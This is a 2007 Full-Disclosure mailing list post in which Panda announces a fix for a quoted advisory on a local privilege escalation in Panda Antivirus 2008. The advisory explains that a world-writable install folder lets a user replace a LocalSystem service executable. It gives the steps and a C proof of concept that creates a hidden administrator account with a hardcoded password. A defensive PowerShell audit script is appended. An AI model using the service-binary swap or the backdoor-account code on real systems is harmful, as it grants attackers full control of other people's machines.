Message-ID: <84ECAF53A2F0F045BD9B7FD0FC56A0BD08E8A7EE@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
Date: Wed, 19 Sep 2007 22:58:42 +0200
From: "Panda Security Response" <secure@...dasecurity.com>
To: "Full Disclosure" <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>
Cc: tarkus@...fp.org, vuldb@...urityfocus.com
Subject: Re: Panda Antivirus 2008 Local Privileg
	Escalation (UPS they did it again)

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Regarding the privilege escalation report below for Panda Antivirus
2008, there is a fix available here:
http://www.pandasecurity.com/homeusers/support/card?id=41111&idIdioma=2&ref=PAV08Dev

Users of vulnerable 2007 versions should upgrade to Panda Antivirus
2008 and apply the fix provided.

For future vulnerability reporting to Panda please write specifically
and exclusively to "Panda Security Response"
<secure@...dasecurity.com> instead of generic beta or informational
contact mailboxes.


- ----------------------------------------------
Pedro Bustamante
Senior Research Advisor
Panda Security

email: pedro.bustamante@...dasecurity.com <0xC684A6F9>
vulns: secure@...dasecurity.com <0x70F3FEA0>
phone: (+34) 91-8063700
blog:  http://research.pandasoftware.com 
- ----------------------------------------------







_________________________________________
Security Advisory
_________________________________________


Severity: Medium
Title: Panda Antivirus 2008 Local Privilege Escalation
Date: 02.08.07
Author: tarkus (tarkus (at) tiifp (dot) org)
URL: https://tiifp.org/tarkus
Vendor: Panda (http://www.pandasoftware.com/)
Affected Products: Panda Antivirus 2008
Not Affected Products:
- Panda Internetsecurity 2008
- Panda Antivirus + Firewall 2008

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Description:
- ------------

1. During installation of Panda Antivirus 2008, the permissions for the
installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008
are set by default to Everyone:Full Control. A few services (e.g.
PAVSRV51.EXE) are started from this folder. Services are started under
the LocalSystem account. There is no protection of service files. It's
possible for an unprivileged user to replace a service executable with a
file of his choice to get full access with LocalSystem privileges, or to
get the privileges of any user (including the system administrator) who
logs on to the vulnerable host. This can be exploited by:

a. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
b. Copy any application to PAVSRV51.exe
c. Reboot

Upon reboot, the trojaned application will be executed under the
LocalSystem account.

BTW: Check this from last year (http://www.securityfocus.com/bid/19891)

POC:
- ----

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system(), _MAX_PATH */

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    /* Locate the Windows directory so net.exe is called by full path. */
    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"owner\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

    system( szCmdLine );

    return 0;
}

Vendor Response:
- ----------------

[...]
Thank you very much for having reported us this piece of information.
This feedback will allow us to keep improving our products and to
prepare new releases that will fit your actual needs and helps us to
create a better product.
[...]

Disclosure Timeline:
- --------------------

2007.06.07 - Vulnerability found
2007.06.07 - Reported to Vendor (Until Beta)
2007.07.31 - Released by vendor
2007.08.02 - Public Disclosure

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBRvGNgo6s6aZw8/6gEQKByQCgkNraFuCwXwqU13zaJfvRroHgKQcAn3mz
lluFlAcVUyeyeuMXqRaiygc5
=8GnR
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
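
A defender-side check for the condition the advisory describes (a LocalSystem service started from a folder that Everyone can write to), as an added example that is not part of the original message or of Panda's fix. It goes beyond the single folder named in the advisory by auditing every LocalSystem service; the function name Get-BroadWriteAce and the choice of SIDs and rights are assumptions of this example.

```powershell
# Added example. Read-only: it reports findings and changes nothing.
# Well-known SIDs instead of names, so the check works on localized Windows.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

# Rights that allow replacing or renaming a file, plus GENERIC_ALL and
# GENERIC_WRITE (0x10000000, 0x40000000), which can appear unmapped in ACEs.
$writeRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$Mask = [int]$writeRights -bor 0x10000000 -bor 0x40000000

# Hypothetical helper: emit one object per Allow ACE that gives a broad
# group any of the rights in $Mask on the given file or folder.
function Get-BroadWriteAce {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $acl = Get-Acl -LiteralPath $Path
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and
            $BroadSids.ContainsKey($sid) -and
            ([int]$ace.FileSystemRights -band $Mask)) {
            [pscustomobject]@{
                Path    = $Path
                Trustee = $BroadSids[$sid]
                Rights  = $ace.FileSystemRights
            }
        }
    }
}

Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        $svc = $_
        $exe = $null
        # PathName is either "quoted path" args, or an unquoted path plus args.
        if ($svc.PathName -match '^\s*"([^"]+)"') { $exe = $Matches[1] }
        elseif ($svc.PathName -match '^\s*(.+?\.exe)\b') { $exe = $Matches[1] }
        if (-not $exe) { return }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        # Check the binary and its folder: write access to either allows a swap.
        $exe, (Split-Path -Parent $exe) |
            ForEach-Object { Get-BroadWriteAce -Path $_ } |
            Select-Object @{n='Service'; e={$svc.Name}}, Path, Trustee, Rights
    }
```

Empty output means no LocalSystem service binary or its folder grants write-type access to the three groups checked.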
